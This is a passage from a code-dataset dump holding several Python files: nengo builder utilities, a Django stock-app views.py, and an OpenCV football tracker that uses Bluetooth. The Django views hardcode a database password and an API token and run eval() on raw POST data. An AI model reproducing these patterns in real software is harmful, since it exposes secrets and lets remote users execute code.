label(transform):\n # determine the label for a connection based on its transform\n transform = np.asarray(transform)\n if len(transform.shape) == 0:\n return ''\n return '%dx%d' % transform.shape\n\n for c in connections:\n text.append(' \"%d\" -> \"%d\" [label=\"%s\"];' % (\n id(c.pre), id(c.post), label(c.transform_full)))\n text.append('}')\n return '\\n'.join(text)\n\n\ndef remove_passthrough_nodes(objs, connections): # noqa: C901\n \"\"\"Returns a version of the model without passthrough Nodes\n\n For some backends (such as SpiNNaker), it is useful to remove Nodes that\n have 'None' as their output. These nodes simply sum their inputs and\n use that as their output. These nodes are defined purely for organizational\n purposes and should not affect the behaviour of the model. For example,\n the 'input' and 'output' Nodes in an EnsembleArray, which are just meant to\n aggregate data.\n\n Note that removing passthrough nodes can simplify a model and may be useful\n for other backends as well. For example, an EnsembleArray connected to\n another EnsembleArray with an identity matrix as the transform\n should collapse down to D Connections between the corresponding Ensembles\n inside the EnsembleArrays.\n\n Parameters\n ----------\n objs : list of Nodes and Ensembles\n All the objects in the model\n connections : list of Connections\n All the Connections in the model\n\n Returns the objs and connections of the resulting model. The passthrough\n Nodes will be removed, and the Connections that interact with those Nodes\n will be replaced with equivalent Connections that don't interact with those\n Nodes.\n \"\"\"\n\n inputs, outputs = find_all_io(connections)\n result_conn = list(connections)\n result_objs = list(objs)\n\n # look for passthrough Nodes to remove\n for obj in objs:\n if isinstance(obj, nengo.Node) and obj.output is None:\n result_objs.remove(obj)\n\n # get rid of the connections to and from this Node\n for c in inputs[obj]:\n result_conn.remove(c)\n outputs[c.pre].remove(c)\n for c in outputs[obj]:\n result_conn.remove(c)\n inputs[c.post].remove(c)\n\n # replace those connections with equivalent ones\n for c_in in inputs[obj]:\n if c_in.pre is obj:\n raise Exception('Cannot remove a Node with feedback')\n\n for c_out in outputs[obj]:\n c = _create_replacement_connection(c_in, c_out)\n if c is not None:\n result_conn.append(c)\n # put this in the list, since it might be used\n # another time through the loop\n outputs[c.pre].append(c)\n inputs[c.post].append(c)\n\n return result_objs, result_conn\n\n\ndef find_all_io(connections):\n \"\"\"Build up a list of all inputs and outputs for each object\"\"\"\n inputs = collections.defaultdict(list)\n outputs = collections.defaultdict(list)\n for c in connections:\n inputs[c.post].append(c)\n outputs[c.pre].append(c)\n return inputs, outputs\n\n\ndef _create_replacement_connection(c_in, c_out):\n \"\"\"Generate a new Connection to replace two through a passthrough Node\"\"\"\n assert c_in.post is c_out.pre\n assert c_in.post.output is None\n\n # determine the filter for the new Connection\n if c_in.synapse is None:\n synapse = c_out.synapse\n elif c_out.synapse is None:\n synapse = c_in.synapse\n else:\n raise NotImplementedError('Cannot merge two filters')\n # Note: the algorithm below is in the right ballpark,\n # but isn't exactly the same as two low-pass filters\n # filter = c_out.filter + c_in.filter\n\n function = c_in.function\n if c_out.function is not None:\n raise Exception('Cannot remove a Node with a' +\n 'function being 
computed on it')\n\n    # compute the combined transform\n    transform = np.dot(c_out.transform_full, c_in.transform_full)\n    # check if the transform is 0 (this happens a lot\n    # with things like identity transforms)\n    if np.all(transform == 0):\n        return None\n\n    with nengo.Network():  # dummy model so connections don't get added\n        args = {}\n        if function is not None:\n            args['function'] = function\n        c = nengo.Connection(c_in.pre, c_out.post,\n                             synapse=synapse,\n                             transform=transform, **args)\n    return c\n","sub_path":"nengo_alt/nengo/utils/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442559987","text":"from django.shortcuts import render\nfrom django.views.decorators.http import require_http_methods\nfrom django.core import serializers\nfrom django.core.serializers import serialize\nfrom django.http import JsonResponse\nfrom rest_framework import viewsets\nfrom django.middleware.csrf import get_token\nimport datetime\nimport time\nfrom dateutil.relativedelta import relativedelta\nimport MySQLdb\nimport pandas as pd\nimport tushare as ts\nimport baostock as bs\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.types import NVARCHAR, Float, Integer\n\nimport json\nimport hashlib\n\nfrom .models import User\nfrom .models import Datastatus\n\n# this should probably be moved into login\nengine_ts = create_engine('mysql://sopython_root:Free0921@127.0.0.1:3306/sopython_aistocks?charset=utf8&use_unicode=1')\ntspro = ts.pro_api('cb01935d73e23f6d59991c576f31534e13659f76be1a94ae403532e3')\n\n'''\nfrom stocks.serializer import UserSerializer\nclass UserViewSet(viewsets.ModelViewSet):\n    queryset = User.objects.all()\n    serializer_class = UserSerializer\n'''\n\ndef hash_code(s, salt='mypython'):\n    h = hashlib.sha256()\n    s += salt\n    h.update(s.encode())\n    return h.hexdigest()\n\n'''\nGet a timestamp.\nConverts a date in \"%Y-%m-%d\" format (e.g. \"2020-11-20\")\nor a time in \"%Y%m%d%H%M%S%f\" format (e.g. \"20201120202854120\")\ninto a timestamp.\n'''\ndef get_timestamp(sdatetime):\n    if (len(sdatetime) <= len(\"2020-11-20\")):\n        timeArray=time.strptime(sdatetime, \"%Y-%m-%d\")\n    else:\n        timeArray=time.strptime(sdatetime,\"%Y%m%d%H%M%S%f\")\n\n    #print(\"timeArray:\", timeArray)\n    timestamp = time.mktime(timeArray) * 1000\n    return timestamp\n\n# CSRF authentication\n@require_http_methods([\"GET\"])\ndef get_csrf(request):\n    response = {}\n\n    # generate the CSRF token and send it to the front end\n    csrf_token = get_token(request)\n\n    #response['Access-Control-Allow-Origin'] = '*'\n\n    response['msg'] = 'success'\n    response['error_num'] = 0\n    response['token'] = csrf_token\n    return JsonResponse(response)\n\n# fetch K-line (candlestick) data\n@require_http_methods([\"GET\"])\ndef get_kline(request):\n    response = {}\n    data = {}\n    asks = []\n    bids = []\n    depths = {}\n    depths['asks'] = asks\n    depths['bids'] = bids\n\n    isLogin = False\n    #verify if is a valid user\n    try:\n        username = request.COOKIES[\"user_name\"]\n        isLogin = request.COOKIES[\"is_login\"]\n    except Exception as e:\n        response['msg'] = 'Not a valid user'\n        response['error_num'] = 1001\n        return JsonResponse(response)\n\n    if not (isLogin and (request.session[\"user_name\"] == username)):\n        response['msg'] = 'session is closed'\n        response['error_num'] = 1001\n        return JsonResponse(response)\n\n    # get the parameters\n    sCode = request.GET[\"sCode\"]\n    sFreq = request.GET[\"sFreq\"]\n\n    #### log in to the BaoStock system ####\n    lg = bs.login()\n    # print the login response info\n    if (lg.error_code != '0'):\n        #print(type(lg.error_code))\n        print('login respond error_code:'+lg.error_code)\n        print('login respond error_msg:'+lg.error_msg)\n        response['msg'] = lg.error_msg\n        response['error_num'] = int(lg.error_code)\n        return JsonResponse(response)\n\n    #get one year datalist\n    one_yrs_ago = datetime.datetime.now() - relativedelta(years=1)\n    sStart = one_yrs_ago.strftime('%Y-%m-%d')\n\n    #### fetch historical K-line data for Shanghai/Shenzhen A shares ####\n    # for detailed field parameters, see the 'historical quotation fields' chapter; 'minute-line' parameters differ from 'day-line' parameters, and 'minute-line' data does not include indices.\n    # minute-line fields: date,time,code,open,high,low,close,volume,amount,adjustflag\n    # week/month-line fields: date,code,open,high,low,close,volume,amount,adjustflag,turn,pctChg\n    # [\"w\", \"d\", \"60\", \"30\", \"15\", \"5\"]\n    if (sFreq in [\"w\", \"d\"]):\n        rs = bs.query_history_k_data_plus(sCode, \"date, open,high,low,close,volume\",\n             start_date= sStart, frequency= sFreq, adjustflag=\"3\")\n    else:\n        rs = bs.query_history_k_data_plus(sCode, \"time, open,high,low,close,volume\",\n             start_date= sStart, frequency= sFreq, adjustflag=\"3\")\n\n    if (rs.error_code != '0'):\n        print('query_history_k_data_plus respond error_code:'+rs.error_code)\n        print('query_history_k_data_plus respond error_msg:'+rs.error_msg)\n        response['msg'] = rs.error_msg\n        response['error_num'] = int(rs.error_code)\n        return JsonResponse(response)\n\n\n    #### print the result set ####\n    data_list = []\n    while (rs.error_code == '0') & rs.next():\n        # fetch one record and merge the records together\n        arow = rs.get_row_data()\n        #print(arow)\n        arowset = []\n        arowset.append(get_timestamp(arow[0]))\n        arowset.append(round(float(arow[1]), 2))\n        arowset.append(round(float(arow[2]), 2))\n        arowset.append(round(float(arow[3]), 2))\n        arowset.append(round(float(arow[4]), 2))\n        arowset.append(float(arow[5])/100)\n        data_list.append(arowset)\n\n    #result = pd.DataFrame(data_list, columns=rs.fields)\n    #### write the result set to a csv file ####\n    #result.to_csv(\"D:\\\\myTemp\\\\data_\" + sCode + \"_\" + sFreq +\".csv\", index=False)\n    #print(result)\n\n    #### log out of the system ####\n    bs.logout()\n\n    response['msg'] = 'success'\n    response['error_num'] = 0\n    response['success'] = True\n\n    data['depths'] = depths\n    data['lines'] = data_list\n\n    response['data'] = data\n\n    return JsonResponse(response, safe=False)\n\n\n# fetch the stock list\n@require_http_methods([\"GET\"])\ndef get_stocklist(request):\n    response = {}\n    selectedStocks = []\n\n    isLogin = False\n    #verify if is a valid user\n    try:\n        username = request.COOKIES[\"user_name\"]\n        isLogin = request.COOKIES[\"is_login\"]\n    except Exception as e:\n        response['msg'] = 'Not a valid user'\n        response['error_num'] = 1001\n        return JsonResponse(response)\n\n\n    #print(\"cookie name:\" + username + \" session name:\" + request.session[\"user_name\"])\n    if not (isLogin and (request.session[\"user_name\"] == username)):\n        response['msg'] = 'session is closed'\n        response['error_num'] = 1001\n        return JsonResponse(response)\n\n    # fetch the favorite-stock info\n    try:\n        user = User.objects.get(name=username)\n        selectedStocks = user.stocks.split(\";\")\n    except :\n        response['msg'] = '用户不存在!'\n        response['error_num'] = 1001\n        return JsonResponse(response)\n\n    #check whether the stocklist has been updated this day\n    if (Datastatus.objects.count() == 0):\n        status = Datastatus()\n        status.save()\n\n    # if the stocklist has not been updated today, update it first\n    if not (Datastatus.objects.filter(id=1).first().update_date == datetime.date.today()):\n        # fetch data from tushare\n        df = tspro.stock_basic(exchange='', list_status='L', fields='symbol,name,area,industry,market,exchange,list_date,is_hs')\n\n        # add an id column\n        df.insert(0, 'id', range(len(df)))\n\n        # add a column: the date this stock's trading info was last updated\n        df['update_date'] = None\n\n        # store into the mysql table\n        res = df.to_sql('stocks_stocklist', engine_ts, index=False, if_exists='replace', chunksize=5000)\n\n        # mark today's stock list as updated\n        Datastatus.objects.filter(id=1).update(update_date=datetime.date.today())\n\n    # return the data from the stocklist table\n    ''' kept for reference\n    datalist = Stocklist.objects.all()\n    json_data = serialize('json', datalist)  # str\n    json_data = json.loads(json_data)  # deserialize into a json object\n    '''\n\n    #get the stocklist from DB\n    try:\n        conn = MySQLdb.connect(host=\"localhost\", user=\"sopython_root\", passwd=\"Free0921\", db=\"sopython_aistocks\", charset='utf8')\n        with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n            cursor.execute(\"select id, symbol, name, market, exchange from stocks_stocklist\")\n            datarows = cursor.fetchall()\n            #print(datarows[0], datarows[1])\n\n            rows = list(datarows)\n            #print(rows[0], rows[1])\n            for row in rows:\n                if (row['symbol'] in selectedStocks):\n                    row.update({'selected': 'true', 'btnname':'-', 'hint':'去自选'})\n                else:\n                    row.update({'selected': 'false', 'btnname':'+', 'hint':'加自选'})\n\n                #print(row)\n    finally:\n        conn.close()\n\n    response['msg'] = 'success'\n    response['error_num'] = 0\n    response['datalist'] = rows\n    #response['datalist'] = json.loads(serializers.serialize(\"json\", rows))\n\n    return JsonResponse(response, safe=False)\n\n# add new user\n@require_http_methods([\"POST\"])\ndef add_user(request):\n    response = {}\n    message = 'success'\n    error_num = 0\n\n    #get the string\n    dic0 = list(request.POST.keys())\n    #print(dic0)\n    #get the value pair from the string\n    dic = eval(dic0[0])\n\n    username = dic.get('name')\n    password = dic.get('password')\n    email = dic.get('email')\n\n    print(password)\n\n    sameuser = User.objects.filter(name=username)\n    if sameuser:\n        message = '用户名已经存在'\n        error_num = 1\n    elif (User.objects.filter(email=email)):\n        message = '该邮箱已经被注册了!'\n        error_num = 1\n    else:\n        try:\n            new_user = User()\n            new_user.name = username\n\n            passcode = hash_code(password)\n            #print(\"passcode:\" + passcode)\n            new_user.password = passcode\n            new_user.email = email\n            new_user.stocks = ''\n\n            new_user.save()\n            message = 'success'\n            error_num = 0\n        except Exception as e:\n            message = str(e)\n            error_num = 1\n\n    response['msg'] = message\n    response['error_num'] = error_num\n    return JsonResponse(response)\n\n@require_http_methods([\"POST\"])\ndef login(request):\n    response = {}\n    message = 'success'\n    error_num = 0\n\n    #get the string\n    dic0 = list(request.POST.keys())\n    #get the value pair from the string\n    dic = eval(dic0[0])\n    #print(dic)\n\n    username = dic.get('name')\n    password = dic.get('password')\n\n    #print('user:', username)\n\n    try:\n        user = User.objects.get(name=username)\n        if user.password == hash_code(password):\n            request.session['is_login'] = True\n            request.session['user_id'] = user.id\n            request.session['user_name'] = user.name\n\n            #print(request.COOKIES.get(\"csrftoken\"))\n\n            response['user_id'] = user.id\n            response['user_name'] = user.name\n            response['is_login'] = True\n            #response['stocks'] = user.stocks\n            #selectedStocks = user.stocks.split()\n\n            message = 'success'\n            error_num = 0\n        else:\n            message = '密码不正确!'\n            error_num = 1\n    except :\n        message = '用户不存在!'\n        error_num = 1\n\n    response['msg'] = message\n    response['error_num'] = error_num\n    return JsonResponse(response)\n\n@require_http_methods([\"POST\"])\ndef logout(request):\n    response = {}\n    message = 'success'\n    error_num = 0\n\n    try:\n        request.session.flush()\n    except Exception as e:\n        message = str(e)\n        error_num = 1\n\n    response['msg'] = message\n    response['error_num'] = error_num\n    return JsonResponse(response)\n\n@require_http_methods([\"POST\"])\ndef save_selected(request):\n    response = {}\n    selectedStocks = []\n\n    isLogin = False\n    #verify if is a valid user\n    try:\n        username = request.COOKIES[\"user_name\"]\n        isLogin = request.COOKIES[\"is_login\"]\n    except Exception as e:\n        response['msg'] = 'Not a valid user'\n        response['error_num'] = 1001\n        return JsonResponse(response)\n\n\n    if not (isLogin and (request.session[\"user_name\"] == username)):\n        response['msg'] = 'session is closed'\n        response['error_num'] = 1001\n        return JsonResponse(response)\n\n    #get the data\n    dic0 = list(request.POST.keys())\n    #get the value pair from the string\n    dic = eval(dic0[0])\n    #print(dic)\n\n    symbol = dic.get('symbol')\n    selected = dic.get('selected')\n\n    print(\"symbol:\" + symbol + \" select:\" + selected)\n\n    # fetch the favorite-stock info\n    try:\n        user = User.objects.get(name=username)\n        str1= user.stocks\n        selectedStocks = str1.split(';')\n\n        if selected == \"true\":\n            if len(selectedStocks) >= 20:\n                response['msg'] = 'The maximum number of favorite stocks is 20'\n                response['error_num'] = 1001\n                return JsonResponse(response)\n            else:\n                selectedStocks.append(symbol)\n        else:\n            selectedStocks.remove(symbol)\n\n        #print(\"s2:\", selectedStocks)\n\n        selectedstr = \";\".join(selectedStocks)\n        user.stocks = selectedstr\n        user.save()\n\n    except Exception as e:\n        response['msg'] = 'Save favorite failed'\n        response['error_num'] = 1001\n        print(str(e))\n        return JsonResponse(response)\n\n    response['msg'] = 'success'\n    response['error_num'] = 0\n    return JsonResponse(response)\n","sub_path":"server/stocks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"131683470","text":"import os\nimport cv2\nimport numpy as np\nimport bluetooth as bt\nimport logging\nimport time\n\n\ndef find_nearest_player(frm, ball_x, ball_y, team_color, plain):\n    imgHSV = cv2.cvtColor(frm, cv2.COLOR_BGR2HSV_FULL)\n    lower = np.array(team_color[0:3])\n    upper = np.array(team_color[3:6])\n    mask = cv2.inRange(imgHSV, lower, upper)\n    kernel = np.ones((5, 5), np.uint8)\n    mask = cv2.dilate(mask, kernel, iterations=1)\n    mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n\n    if plain == 1:\n        lower_parameter = 233\n        upper_parameter = 1300\n    else:\n        lower_parameter = 150\n        upper_parameter = 517\n\n    contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n    distance_to_the_ball = []\n    for cnt in contours:\n        area = cv2.contourArea(cnt)\n        arcLength = cv2.arcLength(cnt, True)\n        approx = cv2.approxPolyDP(cnt, 0.02 * arcLength, True)\n        if lower_parameter < area < upper_parameter:\n            x, y, w, h = cv2.boundingRect(approx)\n            distance_to_the_ball.append(np.sqrt(np.power(ball_x - x, 2) + np.power(ball_y - y, 2)))\n    if distance_to_the_ball:\n        min_distance = min(distance_to_the_ball)\n        return min_distance\n    else:\n        return -1\n\n\ndef detect_lines(frm, my_color):\n    imgHSV = cv2.cvtColor(frm, cv2.COLOR_BGR2HSV_FULL)\n    lower = np.array(my_color[0:3])\n    upper = np.array(my_color[3:6])\n    mask = cv2.inRange(imgHSV, lower, upper)\n    edges = cv2.Canny(mask, 50, 50)\n\n    rho = 1  # check every 1 pixel\n    theta = np.pi / 180  # check every degree\n    threshold = 15  # minimum number of intersections to decide that is line\n    min_line_length = 50  # minimum number of pixels making up a line\n    max_line_gap = 20  # maximum gap in pixels between connectable line segments\n\n    # Run Hough on edge detected image\n    # Output \"lines\" is an array containing endpoints of detected line segments\n    lines = cv2.HoughLinesP(edges, rho, theta, threshold, np.array([]),\n                            min_line_length, 
max_line_gap)\n\n    middle_line = [0, 0, 0, 0]\n    side_line = [0, 0, 0, 0]\n    another_lines = []\n    print(\"lines\")\n    if lines is not None:\n        for line in lines:\n            line_detect = False\n            for x1, y1, x2, y2 in line:\n                length = np.sqrt(np.power(x2 - x1, 2) + np.power(y2 - y1, 2))\n                if length > 400:\n                    if (370 < x1 < 830 or 370 < x2 < 830) and (\n                            abs(x2 - x1) < abs(y2 - y1)):  # narrow down the middle-line region, eliminate the stripes\n                        middle_line = [x1, y1, x2, y2]\n                        print(\"middle\")\n                        line_detect = True\n                    if abs(x2 - x1) > abs(y2 - y1) and length > 770:\n                        side_line = [x1, y1, x2, y2]\n                        print(\"side\")\n                        line_detect = True\n            if not line_detect:\n                print(\"another\")\n                another_line = [x1, y1, x2, y2]\n                another_lines.append(another_line)\n            print(length, x1, y1, x2, y2)\n    middle_line_detect = middle_line[0] + middle_line[1] + middle_line[2] + middle_line[3]\n    side_line_detect = side_line[0] + side_line[1] + side_line[2] + side_line[3]\n    if middle_line_detect != 0 and side_line_detect != 0:\n        return 4, middle_line, side_line\n    elif middle_line_detect != 0:\n        return 1, middle_line, [0, 0, 0, 0]\n    elif side_line_detect:\n        return 2, [0, 0, 0, 0], side_line\n    elif another_lines:\n        return 3, another_lines, [0, 0, 0, 0]\n    else:\n        return 0, [0, 0, 0, 0], [0, 0, 0, 0]\n\n\ndef which_side(ball_x, ball_y, situation, position_side,\n               position_zone):  # -1 - left 0 - undef 1 - right # -1 - down 0 - center 1 - up\n    horizontal = 0\n    vertical = 0\n    if situation == 1 or situation == 4:  # middle_line detected\n        if ball_x > position_side[0] and ball_x > position_side[2]:\n            horizontal = 1\n        elif ball_x < position_side[0] and ball_x < position_side[2]:\n            horizontal = -1\n        elif position_side[0] > position_side[2] and ball_x > position_side[2]:\n            horizontal = 1\n        elif position_side[2] > position_side[0] and ball_x > position_side[0]:\n            horizontal = 1\n        else:\n            horizontal = -1\n    if situation == 2 or situation == 4:  # side_line detected\n        if ball_y > position_zone[1] and ball_y > position_zone[3]:\n            vertical = 1\n        elif ball_y < position_zone[1] and ball_y < position_zone[3]:\n            vertical = -1\n        elif ball_y < 400:\n            vertical = 1\n        else:\n            vertical = -1\n    return horizontal, vertical\n\n\ndef find_ball(frm, my_color, previous_position):\n    img_hsv = cv2.cvtColor(frm, cv2.COLOR_BGR2HSV_FULL)\n    lower = np.array(my_color[0:3])\n    upper = np.array(my_color[3:6])\n    mask = cv2.inRange(img_hsv, lower, upper)\n    kernel = np.ones((3, 3), np.uint8)\n    mask = cv2.bitwise_not(mask)\n    mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)\n    mask = cv2.dilate(mask, kernel, iterations=1)\n    canny_frame = cv2.Canny(mask, 50, 50)\n    contours, hierarchy = cv2.findContours(canny_frame, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n    number_of_ball_position = 0\n    list_of_position = []\n    for cnt in contours:\n        area = cv2.contourArea(cnt)\n        arc_length = cv2.arcLength(cnt, True)\n        approx = cv2.approxPolyDP(cnt, 0.02 * arc_length, True)\n        if 87 < area < 200 and arc_length <= 42.97:\n            x, y, w, h = cv2.boundingRect(approx)\n            number_of_ball_position = number_of_ball_position + 1\n            list_of_position.append([x, y, w, h])\n\n    if previous_position[0] == 0:\n        if number_of_ball_position == 0:\n            return [0, 0, 0, 0]\n        else:  # return first searched position\n            return list_of_position[0]\n    else:\n        if number_of_ball_position == 0:\n            return [0, 0, 0, 0]\n        elif number_of_ball_position == 1:\n            return list_of_position[0]\n        else:\n            actual_pos = 0\n            prev_x = previous_position[0] + previous_position[2] / 2\n            prev_y = previous_position[1] + previous_position[3] / 2\n            x_pos = 
list_of_position[0][0] + list_of_position[0][2] / 2\n y_pos = list_of_position[0][1] + list_of_position[0][3] / 2\n smallest_difference = abs(prev_x - x_pos) + abs(prev_y - y_pos)\n for i, pos in enumerate(list_of_position[1:]):\n x_pos = pos[0] + pos[2] / 2\n y_pos = pos[1] + pos[3] / 2\n difference = abs(prev_x - x_pos) + abs(prev_y - y_pos)\n if difference < smallest_difference:\n smallest_difference = difference\n actual_pos = i\n return list_of_position[actual_pos]\n\n\ndef confirm(sock, status):\n if status:\n sock.send(\"1\".encode(\"utf_8\"))\n print(\"correct\")\n else:\n sock.send(\"0\".encode(\"utf_8\"))\n print(\"error\")\n\n\ndef bluetooth_communication(sock):\n my_colors = []\n data = []\n plain = []\n is_plain_color_write = False\n while True:\n try:\n if len(my_colors) >= 2 and is_plain_color_write is False:\n d = sock.recv(3).decode(\"utf_8\")\n print(\"d plain_color\", int(d))\n plain.append(int(d))\n print(\"plain_color\", plain)\n if d is None:\n confirm(sock, False)\n plain.clear()\n else:\n confirm(sock, True)\n is_plain_color_write = True\n d = sock.recv(3).decode(\"utf_8\")\n print(\"d\", int(d))\n if d is None:\n confirm(sock, False)\n else:\n confirm(sock, True)\n data.append(int(d))\n if len(data) > 5:\n print(\"Received\", data)\n my_colors.append(data)\n print(\"my_colors\", my_colors, len(my_colors))\n confirm(sock, True)\n data = []\n is_plain_color_write = False\n if len(my_colors) > 3:\n break\n except OSError:\n pass\n\n print(\"my_colors\", my_colors)\n print(\"plain_color\", plain)\n\n print(\"Receiving video\")\n if os.path.isfile(\"match_video.mp4\"):\n os.remove(\"match_video.mp4\")\n f = open(\"match_video.mp4\", \"wb\")\n while True:\n try:\n sock.settimeout(20)\n d = sock.recv(10).decode(\"utf_8\")\n if d is None:\n confirm(sock, False)\n elif int(d) < 2:\n confirm(sock, False)\n else:\n confirm(sock, True)\n print(\"video d length\", int(d))\n all_bytes = int(d)\n read_bytes = all_bytes\n sock.recv(10).decode(\"utf_8\")\n while read_bytes > 0:\n amount_of_bytes = min(1024, read_bytes)\n b = sock.recv(amount_of_bytes)\n if not b:\n break\n if b is None:\n confirm(sock, False)\n else:\n confirm(sock, True)\n print(\"video d\", str(b), len(b), int((1 - read_bytes / all_bytes) * 100), read_bytes, all_bytes)\n f.write(b)\n print(\"len decode\", len(b))\n read_bytes = read_bytes - len(b)\n f.close()\n break\n except OSError as e:\n logger.error(str(e), exc_info=True)\n f.close()\n sock.send(\"3\".encode(\"utf_8\"))\n break\n except ValueError:\n pass\n print(\"Receive video\")\n\n return my_colors, plain\n\n\ndef send_results(ball_lost, sock):\n length = str(len(ball_lost) * 3).encode(\"utf_8\")\n print(len(ball_lost))\n print(length)\n sent = False\n while not sent:\n sock.send(length)\n sent = response(sock)\n\n print(ball_lost)\n for i in ball_lost:\n print(\"i\", i)\n for value in i:\n sent = False\n while not sent:\n sock.send(str(value).encode(\"utf_8\"))\n print(value)\n sent = response(sock)\n\n\ndef response(sock):\n r = None\n t1 = time.time()\n while r is None:\n if time.time() - t1 > 10:\n break\n r = sock.recv(1).decode(\"utf_8\")\n if r == \"1\":\n return True\n else:\n return False\n\n\ndef ready(sock):\n sent = False\n while not sent:\n sock.send(\"2\".encode(\"utf_8\"))\n sent = response(sock)\n\n\nserver_sock = bt.BluetoothSocket(bt.RFCOMM)\nserver_sock.bind((\"\", bt.PORT_ANY))\nserver_sock.listen(1)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\nport = server_sock.getsockname()[1]\n\nuuid = 
\"58723436-5452-11eb-ae93-0242ac130002\"\n\nbt.advertise_service(server_sock, \"SampleServer\", service_id=uuid,\n service_classes=[uuid, bt.SERIAL_PORT_CLASS],\n profiles=[bt.SERIAL_PORT_PROFILE],\n )\nwhile True:\n print(\"Waiting for connection on RFCOMM channel\", port)\n\n client_sock, client_info = server_sock.accept()\n print(\"Accepted connection from\", client_info)\n\n colors, plain_color = bluetooth_communication(client_sock)\n path = 'match_video2.mp4'\n video = cv2.VideoCapture(path)\n\n FrameCount = 0\n position = [0, 0, 0, 0]\n actual_side = 0 # 1 - left, 0 - undef, -1 - right\n actual_zone = 0 # 1 - up 0 - central -1 - down\n up = 0\n central = 0\n down = 0\n line_detected = 0\n first_team_at_the_ball = 0\n second_team_at_the_ball = 0\n actual_zone_after_voting = 0\n actual_team_at_the_ball = 0\n ball_lost1 = []\n ball_lost2 = []\n\n colors = [[56, 97, 20, 86, 182, 255],\n [56, 14, 96, 156, 116, 255],\n [237, 111, 68, 265, 255, 255],\n [0, 180, 90, 25, 228, 255]] # FM1\n # colors = [[46, 87, 76, 91, 180, 255],\n # [65, 0, 71, 184, 111, 255],\n # [224, 50, 2, 272, 225, 255],\n # [60, 0, 63, 214, 83, 255]] # FM2\n # colors = [[52, 126, 47, 65, 197, 127],\n # [65, 14, 84, 172, 126, 255],\n # [239, 64, 105, 271, 255, 255],\n # [234, 74, 102, 268, 255, 241]] # FM3\n # colors = [[44, 150, 105, 66, 238, 170],\n # [51, 34, 173, 83, 143, 245],\n # [36, 96, 200, 51, 145, 255],\n # [0, 0, 0, 37, 232, 255]] # real_video\n # pitch color, lines color, 1st team color, 2nd team color\n plain_color = [0, 1] # FM1\n # plain_color = [0, 1] # FM2\n # plain_color = [1, 0] # FM3\n # plain_color = [0, 1] # real_video\n # the same color of T-shirts and shorts\n\n while True:\n\n FrameCount = FrameCount + 1\n ret, frame = video.read()\n if frame is None:\n print(\"ball_lost1\", ball_lost1)\n print(\"ball_lost2\", ball_lost2)\n break\n frame = cv2.resize(frame, (1200, 800))\n\n print(\"frame_count\", FrameCount)\n position = find_ball(frame, colors[0], position)\n\n if FrameCount % 30 == 0:\n\n if first_team_at_the_ball > second_team_at_the_ball:\n if actual_team_at_the_ball == -1:\n ball_lost2.append([actual_zone_after_voting, actual_side, int(round(FrameCount / 30))])\n print(\"First team at the ball\")\n actual_team_at_the_ball = 1\n elif first_team_at_the_ball < second_team_at_the_ball:\n if actual_team_at_the_ball == 1:\n ball_lost1.append([actual_zone_after_voting, actual_side, int(round(FrameCount / 30))])\n print(\"Second team at the ball\")\n actual_team_at_the_ball = -1\n elif actual_team_at_the_ball == 1:\n print(\"First team at the ball\")\n elif actual_team_at_the_ball == -1:\n print(\"Second team at the ball\")\n else:\n print(\"Undef\")\n\n if actual_side == -1:\n print(\"left\")\n elif actual_side == 1:\n print(\"right\")\n else: # actual side = 0\n print(\"undef\")\n if up >= central and up > down:\n print(\"up\")\n actual_zone_after_voting = 1\n elif down >= central and down > up:\n print(\"down\")\n actual_zone_after_voting = -1\n else:\n if line_detected == 1: # some line detected\n print(\"central\")\n actual_zone_after_voting = 0\n else:\n if actual_zone_after_voting == 1:\n print(\"up\")\n elif actual_zone_after_voting == -1:\n print(\"down\")\n else:\n print(\"central\")\n up = 0\n down = 0\n central = 0\n line_detected = 0\n first_team_at_the_ball = 0\n second_team_at_the_ball = 0\n\n if position[0] + position[1] + position[2] + position[3] != 0:\n print(\"pilka\", position)\n line_situation, line_position_side, line_position_zone = detect_lines(frame, colors[1])\n\n if 
line_situation != 0:\n\n line_detected = 1\n hor, ver = which_side(position[0], position[1], line_situation, line_position_side, line_position_zone)\n if hor != 0:\n actual_side = hor\n if actual_side == -1:\n print(\"left\")\n if actual_side == 1:\n print(\"right\")\n if actual_side == 0:\n print(\"undef\")\n\n actual_zone = ver\n if actual_zone == -1:\n down = down + 1\n print(\"down\", down)\n if actual_zone == 1:\n up = up + 1\n print(\"up\", up)\n if actual_zone == 0:\n central = central + 1\n print(\"central\", central)\n\n nearest_player_first_team = find_nearest_player(frame, position[0], position[1], colors[2],\n plain_color[0])\n nearest_player_second_team = find_nearest_player(frame, position[0], position[1], colors[3],\n plain_color[1])\n\n if (nearest_player_first_team != -1 or nearest_player_second_team != -1) and (\n nearest_player_first_team < 50 or nearest_player_second_team < 50):\n string1 = \" 1 \" + str(nearest_player_first_team)\n print(string1)\n string2 = \" 2 \" + str(nearest_player_second_team)\n print(string2)\n if nearest_player_first_team < nearest_player_second_team: # distance from ball\n first_team_at_the_ball = first_team_at_the_ball + 1\n print(first_team_at_the_ball)\n else:\n second_team_at_the_ball = second_team_at_the_ball + 1\n print(second_team_at_the_ball)\n key = cv2.waitKey(5) & 0xFF\n if key == ord('q'):\n break\n\n ready(client_sock)\n print(\"ready state complete\")\n send_results(ball_lost1, client_sock)\n print(\"send results1 complete\")\n send_results(ball_lost2, client_sock)\n print(\"send results2 complete\")\n\n video.release()\n cv2.destroyAllWindows()\n","sub_path":"OwnTracker.py","file_name":"OwnTracker.py","file_ext":"py","file_size_in_byte":17784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"77656022","text":"\"\"\"CopyTraceView output plugin.\n\nThis plugin adds a shortcut to the trace view to skip through spike pairs\norganized by ISI.\n\nTo activate the plugin, copy this file to `~/.phy/plugins/` and add this line\nto your 